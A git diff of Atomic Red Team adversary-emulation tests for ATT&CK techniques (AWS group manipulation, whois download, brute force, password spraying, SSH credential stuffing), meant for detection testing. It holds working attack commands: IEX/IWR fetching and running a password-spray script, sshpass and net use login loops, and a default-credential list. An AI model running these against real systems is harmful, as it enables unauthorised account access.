+line=`grep -n atomicredteam ~/.aws/credentials | cut -d : -f1 |bc` 
+access="$(($line+1))"
+secret="$(($line+2))"
+sed -i '' "${access}s|aws_access_key_id = .*$|aws_access_key_id = $access_key|g" ~/.aws/credentials
+sed -i '' "${secret}s|aws_secret_access_key = .*$|aws_secret_access_key = $secret_key|g" ~/.aws/credentials
+	
+
diff --git a/atomics/T1098.004/T1098.004.md b/atomics/T1098.004/T1098.004.md
index 10dae2f0..e3e11db8 100644
--- a/atomics/T1098.004/T1098.004.md
+++ b/atomics/T1098.004/T1098.004.md
@@ -18,6 +18,10 @@ If the user is able to save the same contents in the authorized_keys file, it sh
 **Supported Platforms:** macOS, Linux
 
 
+**auto_generated_guid:** 342cc723-127c-4d3a-8292-9c0c6b4ecadc
+
+
+
 
 
 
diff --git a/atomics/T1098/T1098.md b/atomics/T1098/T1098.md
index 221f8feb..d6643fc3 100644
--- a/atomics/T1098/T1098.md
+++ b/atomics/T1098/T1098.md
@@ -8,6 +8,8 @@
 
 - [Atomic Test #2 - Domain Account and Group Manipulate](#atomic-test-2---domain-account-and-group-manipulate)
 
+- [Atomic Test #3 - AWS - Create a group and add a user to that group](#atomic-test-3---aws---create-a-group-and-add-a-user-to-that-group)
+
 
 <br/>
 
@@ -17,6 +19,10 @@ Manipulate Admin Account Name
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** 5598f7cb-cf43-455e-883a-f6008c5d46af
+
+
+
 
 
 
@@ -78,10 +84,14 @@ Example: `Invoke-AtomicTest -Session $session 'T1098' -TestNames "Domain Account
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** a55a22e9-a3d3-42ce-bd48-2653adb8f7a9
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | account_prefix | Prefix string of the random username (by default, atr-). Because the cleanup deletes such account based on
 a match `(&(samaccountname=#{account_prefix}-*)(givenName=Test))`, if you are to change it, be careful. | String | atr-|
@@ -121,7 +131,7 @@ Try {
 } 
 Catch {
     exit 1
-} 
+}
 ```
 ##### Get Prereq Commands:
 ```powershell
@@ -135,4 +145,55 @@ if((Get-CimInstance -ClassName Win32_OperatingSystem).ProductType -eq 1) {
 
 
 
+<br/>
+<br/>
+
+## Atomic Test #3 - AWS - Create a group and add a user to that group
+Adversaries create AWS group, add users to specific to that group to elevate their privilieges to gain more accesss
+
+**Supported Platforms:** Iaas:aws
+
+
+**auto_generated_guid:** 8822c3b0-d9f9-4daf-a043-49f110a31122
+
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| username | Name of the AWS group to create | String | atomicredteam|
+
+
+#### Attack Commands: Run with `sh`! 
+
+
+```sh
+aws iam create-group --group-name #{username}
+aws iam add-user-to-group --user-name #{username} --group-name #{username}
+```
+
+#### Cleanup Commands:
+```sh
+aws iam remove-user-from-group --user-name #{username} --group-name #{username}
+aws iam delete-group --group-name #{username}
+```
+
+
+
+#### Dependencies:  Run with `sh`!
+##### Description: Check if the user exists, we can only add a user to a group if the user exists.
+##### Check Prereq Commands:
+```sh
+aws iam list-users | grep #{username}
+```
+##### Get Prereq Commands:
+```sh
+echo Please run atomic test T1136.003, before running this atomic test
+```
+
+
+
+
 <br/>
diff --git a/atomics/T1098/T1098.yaml b/atomics/T1098/T1098.yaml
index e1093c43..8d72ceb3 100644
--- a/atomics/T1098/T1098.yaml
+++ b/atomics/T1098/T1098.yaml
@@ -101,3 +101,31 @@ atomic_tests:
       Get-ADUser -LDAPFilter "(&(samaccountname=#{account_prefix}-*)(givenName=Test))" | Remove-ADUser -Confirm:$False
     name: powershell
 
+- name: AWS - Create a group and add a user to that group
+  auto_generated_guid: 8822c3b0-d9f9-4daf-a043-49f110a31122
+  description: |
+    Adversaries create AWS group, add users to specific to that group to elevate their privilieges to gain more accesss
+  supported_platforms:
+  - iaas:aws
+  input_arguments:
+    username:
+      description: Name of the AWS group to create
+      type: String
+      default: "atomicredteam"
+  dependencies:
+    - description: |
+        Check if the user exists, we can only add a user to a group if the user exists.
+      prereq_command: |
+        aws iam list-users | grep #{username}
+      get_prereq_command: |
+        echo Please run atomic test T1136.003, before running this atomic test
+  executor:
+    command: |
+      aws iam create-group --group-name #{username}
+      aws iam add-user-to-group --user-name #{username} --group-name #{username}
+    cleanup_command: |
+      aws iam remove-user-from-group --user-name #{username} --group-name #{username}
+      aws iam delete-group --group-name #{username}
+    name: sh
+
+
diff --git a/atomics/T1105/T1105.md b/atomics/T1105/T1105.md
index fc154f30..caef3d08 100644
--- a/atomics/T1105/T1105.md
+++ b/atomics/T1105/T1105.md
@@ -30,6 +30,8 @@
 
 - [Atomic Test #13 - Download a File with Windows Defender MpCmdRun.exe](#atomic-test-13---download-a-file-with-windows-defender-mpcmdrunexe)
 
+- [Atomic Test #14 - whois file download](#atomic-test-14---whois-file-download)
+
 
 <br/>
 
@@ -39,10 +41,14 @@ Utilize rsync to perform a remote file copy (push)
 **Supported Platforms:** Linux, macOS
 
 
+**auto_generated_guid:** 0fc6e977-cb12-44f6-b263-2824ba917409
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | remote_path | Remote path to receive rsync | Path | /tmp/victim-files|
 | remote_host | Remote host to copy toward | String | victim-host|
@@ -71,10 +77,14 @@ Utilize rsync to perform a remote file copy (pull)
 **Supported Platforms:** Linux, macOS
 
 
+**auto_generated_guid:** 3180f7d5-52c0-4493-9ea0-e3431a84773f
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | remote_path | Path of folder to copy | Path | /tmp/adversary-rsync/|
 | remote_host | Remote host to copy from | String | adversary-host|
@@ -103,10 +113,14 @@ Utilize scp to perform a remote file copy (push)
 **Supported Platforms:** Linux, macOS
 
 
+**auto_generated_guid:** 83a49600-222b-4866-80a0-37736ad29344
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | remote_path | Remote path to receive scp | Path | /tmp/victim-files/|
 | local_file | Path of file to copy | Path | /tmp/adversary-scp|
@@ -135,10 +149,14 @@ Utilize scp to perform a remote file copy (pull)
 **Supported Platforms:** Linux, macOS
 
 
+**auto_generated_guid:** b9d22b9a-9778-4426-abf0-568ea64e9c33
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | remote_host | Remote host to copy from | String | adversary-host|
 | local_path | Local path to receive scp | Path | /tmp/victim-files/|
@@ -167,10 +185,14 @@ Utilize sftp to perform a remote file copy (push)
 **Supported Platforms:** Linux, macOS
 
 
+**auto_generated_guid:** f564c297-7978-4aa9-b37a-d90477feea4e
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | remote_path | Remote path to receive sftp | Path | /tmp/victim-files/|
 | local_file | Path of file to copy | Path | /tmp/adversary-sftp|
@@ -199,10 +221,14 @@ Utilize sftp to perform a remote file copy (pull)
 **Supported Platforms:** Linux, macOS
 
 
+**auto_generated_guid:** 0139dba1-f391-405e-a4f5-f3989f2c88ef
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | remote_host | Remote host to copy from | String | adversary-host|
 | local_path | Local path to receive sftp | Path | /tmp/victim-files/|
@@ -231,10 +257,14 @@ Use certutil -urlcache argument to download a file from the web. Note - /urlcach
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** dd3b61dd-7bbc-48cd-ab51-49ad1a776df0
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | remote_file | URL of file to copy | Url | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/LICENSE.txt|
 | local_path | Local path to place file | Path | Atomic-license.txt|
@@ -265,10 +295,14 @@ Use certutil -verifyctl argument to download a file from the web. Note - /verify
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** ffd492e3-0455-4518-9fb1-46527c9f241b
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | remote_file | URL of file to copy | Url | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/LICENSE.txt|
 | local_path | Local path to place file | Path | Atomic-license.txt|
@@ -304,10 +338,14 @@ This technique is used by Qbot malware to download payloads.
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** a1921cd3-9a2d-47d5-a891-f1d0f2a7a31b
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | bits_job_name | Name of the created BITS job | String | qcxjb7|
 | local_path | Local path to place file | Path | %temp%&#92;Atomic-license.txt|
@@ -336,10 +374,14 @@ This technique is used by multiple adversaries and malware families.
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** 42dc4460-9aa6-45d3-b1a6-3955d34e1fe8
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | remote_file | URL of file to copy | Url | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/LICENSE.txt|
 | destination_path | Destination path to file | Path | $env:TEMP&#92;Atomic-license.txt|
@@ -370,10 +412,14 @@ OSTap copies itself in a specfic way to shares and secondary drives. This emulat
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** 2ca61766-b456-4fcf-a35a-1233685e1cad
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | destination_path | Path to create remote file at. Default is local admin share. | String | &#92;&#92;localhost&#92;C$|
 
@@ -405,6 +451,10 @@ Upon successful execution, this will rename cmd.exe as svchost.exe and move it t
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** fa5a2759-41d7-4e13-a19c-e8f28a53566f
+
+
+
 
 
 
@@ -439,10 +489,14 @@ More info and how to find your version can be found here https://lolbas-project.
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** 815bef8b-bf91-4b67-be4c-abe4c2a94ccc
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | remote_file | URL of file to download | url | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/LICENSE.txt|
 | local_path | Location to save downloaded file | path | %temp%&#92;Atomic-license.txt|
@@ -472,7 +526,7 @@ $retVal = 1
 foreach ($version in @("4.18.2007.8-0","4.18.2007.9","4.18.2009.9")){
   if (Test-Path "$env:ProgramData\Microsoft\Windows Defender\Platform\$version") { $retVal =  0}
 }
-exit $retVal 
+exit $retVal
 ```
 ##### Get Prereq Commands:
 ```powershell
@@ -482,4 +536,57 @@ Write-Host "Windows Defender verion 4.18.2007.8-0, 4.18.2007.9, or 4.18.2009.9 m
 
 
 
+<br/>
+<br/>
+
+## Atomic Test #14 - whois file download
+Download a remote file using the whois utility
+
+**Supported Platforms:** Linux, macOS
+
+
+**auto_generated_guid:** c99a829f-0bb8-4187-b2c6-d47d1df74cab
+
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| remote_host | Remote hostname or IP address | String | localhost|
+| remote_port | Remote port to connect to | Integer | 8443|
+| output_file | Path of file to save output to | Path | /tmp/T1105.whois.out|
+| query | Query to send to remote server | String | Hello from Atomic Red Team test T1105|
+| timeout | Timeout period before ending process (seconds) | Integer | 1|
+
+
+#### Attack Commands: Run with `sh`! 
+
+
+```sh
+timeout --preserve-status #{timeout} whois -h #{remote_host} -p #{remote_port} "#{query}" > #{output_file}
+```
+
+#### Cleanup Commands:
+```sh
+rm -f #{output_file}
+```
+
+
+
+#### Dependencies:  Run with `sh`!
+##### Description: The whois and timeout commands must be present
+##### Check Prereq Commands:
+```sh
+which whois && which timeout
+```
+##### Get Prereq Commands:
+```sh
+echo "Please install timeout and the whois package"
+```
+
+
+
+
 <br/>
diff --git a/atomics/T1105/T1105.yaml b/atomics/T1105/T1105.yaml
index 8a7c65e2..c90158a6 100644
--- a/atomics/T1105/T1105.yaml
+++ b/atomics/T1105/T1105.yaml
@@ -304,7 +304,7 @@ atomic_tests:
     Uses the Windows Defender to download a file from the internet (must have version 4.18.2007.8-0, 4.18.2007.9, or 4.18.2009.9 installed).
     The input arguments "remote_file" and "local_path" can be used to specify the download URL and the name of the output file.
     By default, the test downloads the Atomic Red Team license file to the temp directory.
-    
+
     More info and how to find your version can be found here https://lolbas-project.github.io/lolbas/Binaries/MpCmdRun/
   supported_platforms:
   - windows
@@ -335,3 +335,49 @@ atomic_tests:
       del #{local_path} >nul 2>&1
       del %temp%\MpCmdRun.log >nul 2>&1
     name: command_prompt
+- name: whois file download
+  auto_generated_guid: c99a829f-0bb8-4187-b2c6-d47d1df74cab
+  description: |
+    Download a remote file using the whois utility
+
+  supported_platforms:
+  - linux
+  - macos
+
+  input_arguments:
+    remote_host:
+      description: Remote hostname or IP address
+      type: String
+      default: localhost
+    remote_port:
+      description: Remote port to connect to
+      type: Integer
+      default: 8443
+    output_file:
+      description: Path of file to save output to
+      type: Path
+      default: /tmp/T1105.whois.out
+    query:
+      description: Query to send to remote server
+      type: String
+      default: "Hello from Atomic Red Team test T1105"
+    timeout:
+      description: Timeout period before ending process (seconds)
+      type: Integer
+      default: 1
+
+  dependencies:
+    - description: |
+        The whois and timeout commands must be present
+      prereq_command: |
+        which whois && which timeout
+      get_prereq_command: |
+        echo "Please install timeout and the whois package"
+
+  executor:
+    name: sh
+    elevation_required: false
+    command: |
+      timeout --preserve-status #{timeout} whois -h #{remote_host} -p #{remote_port} "#{query}" > #{output_file}
+    cleanup_command: |
+      rm -f #{output_file}
diff --git a/atomics/T1106/T1106.md b/atomics/T1106/T1106.md
index 6e9899b7..0e25b7fe 100644
--- a/atomics/T1106/T1106.md
+++ b/atomics/T1106/T1106.md
@@ -21,10 +21,14 @@ Execute program by leveraging Win32 API's. By default, this will launch calc.exe
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** 99be2089-c52d-4a4a-b5c3-261ee42c8b62
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | source_file | Location of the CSharp source file to compile and execute | Path | PathToAtomicsFolder&#92;T1106&#92;src&#92;CreateProcess.cs|
 | output_file | Location of the payload | Path | %tmp%&#92;T1106.exe|
diff --git a/atomics/T1110.001/T1110.001.md b/atomics/T1110.001/T1110.001.md
index c92a2e31..1a6ad4fa 100644
--- a/atomics/T1110.001/T1110.001.md
+++ b/atomics/T1110.001/T1110.001.md
@@ -38,10 +38,14 @@ Creates username and password files then attempts to brute force on remote host
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** 09480053-2f98-4854-be6e-71ae5f672224
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | input_file_users | Path to a file containing a list of users that we will attempt to brute force | Path | DomainUsers.txt|
 | input_file_passwords | Path to a file containing a list of passwords we will attempt to brute force with | Path | passwords.txt|
@@ -60,6 +64,11 @@ echo "Password!" >> #{input_file_passwords}
 @FOR /F %n in (#{input_file_users}) DO @FOR /F %p in (#{input_file_passwords}) DO @net use #{remote_host} /user:#{domain}\%n %p 1>NUL 2>&1 && @echo [*] %n:%p && @net use /delete #{remote_host} > NUL
 ```
 
+#### Cleanup Commands:
+```cmd
+del #{input_file_users}
+del #{input_file_passwords}
+```
 
 
 
@@ -74,10 +83,14 @@ Attempt to brute force domain user on a domain controller, via LDAP, with NTLM o
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** c2969434-672b-4ec8-8df0-bbb91f40e250
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | user | Account to bruteforce | String | bruce.wayne|
 | passwords | List of passwords we will attempt to brute force with | String | Password1`n1q2w3e4r`nPassword!|
diff --git a/atomics/T1110.001/T1110.001.yaml b/atomics/T1110.001/T1110.001.yaml
index 9cec219a..3cd7f88a 100644
--- a/atomics/T1110.001/T1110.001.yaml
+++ b/atomics/T1110.001/T1110.001.yaml
@@ -32,6 +32,9 @@ atomic_tests:
       echo "1q2w3e4r" >> #{input_file_passwords}
       echo "Password!" >> #{input_file_passwords}
       @FOR /F %n in (#{input_file_users}) DO @FOR /F %p in (#{input_file_passwords}) DO @net use #{remote_host} /user:#{domain}\%n %p 1>NUL 2>&1 && @echo [*] %n:%p && @net use /delete #{remote_host} > NUL
+    cleanup_command: |-
+      del #{input_file_users}
+      del #{input_file_passwords}
 - name: Brute Force Credentials of single domain user via LDAP against domain controller (NTLM or Kerberos)
   auto_generated_guid: c2969434-672b-4ec8-8df0-bbb91f40e250
   description: |
diff --git a/atomics/T1110.002/T1110.002.md b/atomics/T1110.002/T1110.002.md
index d2184605..67d78ecd 100644
--- a/atomics/T1110.002/T1110.002.md
+++ b/atomics/T1110.002/T1110.002.md
@@ -15,10 +15,14 @@ Execute Hashcat.exe with provided SAM file from registry of Windows and Password
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** 6d27df5d-69d4-4c91-bc33-5983ffe91692
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | hashcat_exe | Path to Hashcat executable | String | %temp%&#92;hashcat6&#92;hashcat-6.1.1&#92;hashcat.exe|
 | input_file_sam | Path to SAM file | string | PathToAtomicsFolder&#92;T1110.002&#92;src&#92;sam.txt|
@@ -47,7 +51,7 @@ del %temp%\hashcat-unzip /Q /S >nul 2>&1
 ##### Description: Hashcat must exist on disk at specified location (#{hashcat_exe})
 ##### Check Prereq Commands:
 ```powershell
-if (Test-Path  $(cmd /c echo #{hashcat_exe})) {exit 0} else {exit 1} 
+if (Test-Path  $(cmd /c echo #{hashcat_exe})) {exit 0} else {exit 1}
 ```
 ##### Get Prereq Commands:
 ```powershell
diff --git a/atomics/T1110.003/T1110.003.md b/atomics/T1110.003/T1110.003.md
index 7c23832c..b8450e15 100644
--- a/atomics/T1110.003/T1110.003.md
+++ b/atomics/T1110.003/T1110.003.md
@@ -41,10 +41,14 @@ See the "Windows FOR Loop Password Spraying Made Easy" blog by @OrOneEqualsOne f
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** 90bc2e54-6c84-47a5-9439-0a2a92b4b175
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | password | The password to try for each user in users.txt | string | Spring2020|
 
@@ -63,7 +67,7 @@ See the "Windows FOR Loop Password Spraying Made Easy" blog by @OrOneEqualsOne f
 ##### Description: List of domain users to password spray must exits at %temp%\users.txt
 ##### Check Prereq Commands:
 ```cmd
-if not exist %temp%\users.txt (exit /b 1) 
+if not exist %temp%\users.txt (exit /b 1)
 ```
 ##### Get Prereq Commands:
 ```cmd
@@ -84,10 +88,14 @@ https://github.com/dafthack/DomainPasswordSpray
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** 263ae743-515f-4786-ac7d-41ef3a0d4b2b
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | domain | Domain to brute force against | String | (Get-ADDomain | Select-Object -ExpandProperty Name)|
 
@@ -96,6 +104,7 @@ https://github.com/dafthack/DomainPasswordSpray
 
 
 ```powershell
+[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
 IEX (IWR 'https://raw.githubusercontent.com/dafthack/DomainPasswordSpray/94cb72506b9e2768196c8b6a4b7af63cebc47d88/DomainPasswordSpray.ps1' -UseBasicParsing); Invoke-DomainPasswordSpray -Password Spring2017 -Domain #{domain} -Force
 ```
 
@@ -115,10 +124,14 @@ Prerequisite: AD RSAT PowerShell module is needed and it must run under a domain
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** f14d956a-5b6e-4a93-847f-0c415142f07d
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | password | single password we will attempt to auth with (if you need several passwords, then it is a bruteforce so see T1110.001) | String | P@ssw0rd!|
 | domain | Domain FQDN | String | contoso.com|
diff --git a/atomics/T1110.003/T1110.003.yaml b/atomics/T1110.003/T1110.003.yaml
index 0ebeed4c..79d64c86 100644
--- a/atomics/T1110.003/T1110.003.yaml
+++ b/atomics/T1110.003/T1110.003.yaml
@@ -53,6 +53,7 @@ atomic_tests:
     name: powershell
     elevation_required: false
     command: |
+      [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
       IEX (IWR 'https://raw.githubusercontent.com/dafthack/DomainPasswordSpray/94cb72506b9e2768196c8b6a4b7af63cebc47d88/DomainPasswordSpray.ps1' -UseBasicParsing); Invoke-DomainPasswordSpray -Password Spring2017 -Domain #{domain} -Force
 - name: Password spray all domain users with a single password via LDAP against domain controller (NTLM or Kerberos)
   auto_generated_guid: f14d956a-5b6e-4a93-847f-0c415142f07d
diff --git a/atomics/T1110.004/T1110.004.md b/atomics/T1110.004/T1110.004.md
new file mode 100644
index 00000000..fb33c74f
--- /dev/null
+++ b/atomics/T1110.004/T1110.004.md
@@ -0,0 +1,123 @@
+# T1110.004 - Credential Stuffing
+## [Description from ATT&CK](https://attack.mitre.org/techniques/T1110/004)
+<blockquote>Adversaries may use credentials obtained from breach dumps of unrelated accounts to gain access to target accounts through credential overlap. Occasionally, large numbers of username and password pairs are dumped online when a website or service is compromised and the user account credentials accessed. The information may be useful to an adversary attempting to compromise accounts by taking advantage of the tendency for users to use the same passwords across personal and business accounts.
+
+Credential stuffing is a risky option because it could cause numerous authentication failures and account lockouts, depending on the organization's login failure policies.
+
+Typically, management services over commonly used ports are used when stuffing credentials. Commonly targeted services include the following:
+
+* SSH (22/TCP)
+* Telnet (23/TCP)
+* FTP (21/TCP)
+* NetBIOS / SMB / Samba (139/TCP & 445/TCP)
+* LDAP (389/TCP)
+* Kerberos (88/TCP)
+* RDP / Terminal Services (3389/TCP)
+* HTTP/HTTP Management Services (80/TCP & 443/TCP)
+* MSSQL (1433/TCP)
+* Oracle (1521/TCP)
+* MySQL (3306/TCP)
+* VNC (5900/TCP)
+
+In addition to management services, adversaries may "target single sign-on (SSO) and cloud-based applications utilizing federated authentication protocols," as well as externally facing email applications, such as Office 365.(Citation: US-CERT TA18-068A 2018)</blockquote>
+
+## Atomic Tests
+
+- [Atomic Test #1 - SSH Credential Stuffing From Linux](#atomic-test-1---ssh-credential-stuffing-from-linux)
+
+- [Atomic Test #2 - SSH Credential Stuffing From MacOS](#atomic-test-2---ssh-credential-stuffing-from-macos)
+
+
+<br/>
+
+## Atomic Test #1 - SSH Credential Stuffing From Linux
+Using username,password combination from a password dump to login over SSH.
+
+**Supported Platforms:** Linux
+
+
+**auto_generated_guid:** 4f08197a-2a8a-472d-9589-cd2895ef22ad
+
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| target_host | IP Address / Hostname you want to target. | String | localhost|
+
+
+#### Attack Commands: Run with `bash`! 
+
+
+```bash
+cp $PathToAtomicsFolder/T1110.004/src/credstuffuserpass.txt /tmp/
+for unamepass in $(cat /tmp/credstuffuserpass.txt);do sshpass -p `echo $unamepass | cut -d":" -f2` ssh -o 'StrictHostKeyChecking=no' `echo $unamepass | cut -d":" -f1`@#{target_host};done
+```
+
+
+
+
+#### Dependencies:  Run with `bash`!
+##### Description: Requires SSHPASS
+##### Check Prereq Commands:
+```bash
+if [ -x "$(command -v sshpass)" ]; then exit 0; else exit 1; fi;
+```
+##### Get Prereq Commands:
+```bash
+if [ $(cat /etc/os-release | grep -i ID=ubuntu) ] || [ $(cat /etc/os-release | grep -i ID=kali) ]; then sudo apt update && sudo apt install sshpass -y; else echo "This test requires sshpass" ; fi ;
+```
+
+
+
+
+<br/>
+<br/>
+
+## Atomic Test #2 - SSH Credential Stuffing From MacOS
+Using username,password combination from a password dump to login over SSH.
+
+**Supported Platforms:** macOS
+
+
+**auto_generated_guid:** d546a3d9-0be5-40c7-ad82-5a7d79e1b66b
+
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| target_host | IP Address / Hostname you want to target. | String | localhost|
+
+
+#### Attack Commands: Run with `bash`! 
+
+
+```bash
+cp $PathToAtomicsFolder/T1110.004/src/credstuffuserpass.txt /tmp/
+for unamepass in $(cat /tmp/credstuffuserpass.txt);do sshpass -p `echo $unamepass | cut -d":" -f2` ssh -o 'StrictHostKeyChecking=no' `echo $unamepass | cut -d":" -f1`@#{target_host};done
+```
+
+
+
+
+#### Dependencies:  Run with `bash`!
+##### Description: Requires SSHPASS
+##### Check Prereq Commands:
+```bash
+if [ -x "$(command -v sshpass)" ]; then exit 0; else exit 1; fi;
+```
+##### Get Prereq Commands:
+```bash
+/bin/bash -c "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/master/install.sh)"
+brew install hudochenkov/sshpass/sshpass
+```
+
+
+
+
+<br/>
diff --git a/atomics/T1110.004/T1110.004.yaml b/atomics/T1110.004/T1110.004.yaml
new file mode 100644
index 00000000..0c408431
--- /dev/null
+++ b/atomics/T1110.004/T1110.004.yaml
@@ -0,0 +1,66 @@
+---
+attack_technique: T1110.004
+display_name: 'Brute Force: Credential Stuffing'
+
+atomic_tests:
+- name: SSH Credential Stuffing From Linux
+  auto_generated_guid: 4f08197a-2a8a-472d-9589-cd2895ef22ad
+  description: |
+    Using username,password combination from a password dump to login over SSH.
+
+  supported_platforms:
+    - linux
+
+  input_arguments:
+    target_host:
+      description: IP Address / Hostname you want to target.
+      type: String
+      default: localhost
+
+  dependency_executor_name: bash
+  dependencies:
+    - description: |
+        Requires SSHPASS
+      prereq_command: |
+        if [ -x "$(command -v sshpass)" ]; then exit 0; else exit 1; fi;
+      get_prereq_command: |
+        if [ $(cat /etc/os-release | grep -i ID=ubuntu) ] || [ $(cat /etc/os-release | grep -i ID=kali) ]; then sudo apt update && sudo apt install sshpass -y; else echo "This test requires sshpass" ; fi ;
+
+  executor:
+    name: bash
+    elevation_required: false
+    command: |
+      cp $PathToAtomicsFolder/T1110.004/src/credstuffuserpass.txt /tmp/
+      for unamepass in $(cat /tmp/credstuffuserpass.txt);do sshpass -p `echo $unamepass | cut -d":" -f2` ssh -o 'StrictHostKeyChecking=no' `echo $unamepass | cut -d":" -f1`@#{target_host};done
+
+- name: SSH Credential Stuffing From MacOS
+  auto_generated_guid: d546a3d9-0be5-40c7-ad82-5a7d79e1b66b
+  description: |
+    Using username,password combination from a password dump to login over SSH.
+
+  supported_platforms:
+    - macos
+
+  input_arguments:
+    target_host:
+      description: IP Address / Hostname you want to target.
+      type: String
+      default: localhost
+
+  dependency_executor_name: bash
+  dependencies:
+    - description: |
+        Requires SSHPASS
+      prereq_command: |
+        if [ -x "$(command -v sshpass)" ]; then exit 0; else exit 1; fi;
+      get_prereq_command: |
+        /bin/bash -c "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/master/install.sh)"
+        brew install hudochenkov/sshpass/sshpass
+
+  executor:
+    name: bash
+    elevation_required: false
+    command: |
+      cp $PathToAtomicsFolder/T1110.004/src/credstuffuserpass.txt /tmp/
+      for unamepass in $(cat /tmp/credstuffuserpass.txt);do sshpass -p `echo $unamepass | cut -d":" -f2` ssh -o 'StrictHostKeyChecking=no' `echo $unamepass | cut -d":" -f1`@#{target_host};done
+
diff --git a/atomics/T1110.004/src/credstuffuserpass.txt b/atomics/T1110.004/src/credstuffuserpass.txt
new file mode 100644
index 00000000..ed0295f7
--- /dev/null
+++ b/atomics/T1110.004/src/credstuffuserpass.txt
@@ -0,0 +1,482 @@
+ADMINISTRATOR:ADMINISTRATOR
+ADMN:admn
+Administrator:3ware
+Administrator:admin
+Administrator:changeme
+Administrator:ganteng
+Administrator:letmein
+Administrator:password
+Administrator:pilou
+Administrator:smcadmin
+Any:12345
+CSG:SESAME
+Cisco:Cisco
+D-Link:D-Link
+DTA:TJM
+GEN1:gen1
+GEN2:gen2
+GlobalAdmin:GlobalAdmin
+HTTP:HTTP
+IntraStack:Asante
+IntraSwitch:Asante
+JDE:JDE
+LUCENT01:UI-PSWD-01
+LUCENT02:UI-PSWD-02
+MDaemon:MServer
+MICRO:RSX
+Manager:Manager
+Manager:friend
+NAU:NAU
+NETWORK:NETWORK
+NICONEX:NICONEX
+PBX:PBX
+PFCUser:240653C9467E45
+PRODDTA:PRODDTA
+PSEAdmin:$secure$
+PlcmSpIp:PlcmSpIp
+Polycom:SpIp
+RMUser1:password
+SYSADM:sysadm
+Sweex:Mysweex
+USERID:PASSW0RD
+User:Password
+VNC:winterm
+VTech:VTech
+ZXDSL:ZXDSL
+acc:acc
+adfexc:adfexc
+admin:0
+admin:0000
+admin:1111
+admin:11111111
+admin:123
+admin:1234
+admin:123456
+admin:1234567890
+admin:1234admin
+admin:2222
+admin:22222
+admin:3477
+admin:3ascotel
+admin:7ujMko0admin
+admin:7ujMko0vizxv
+admin:9999
+admin:Admin
+admin:AitbISP4eCiG
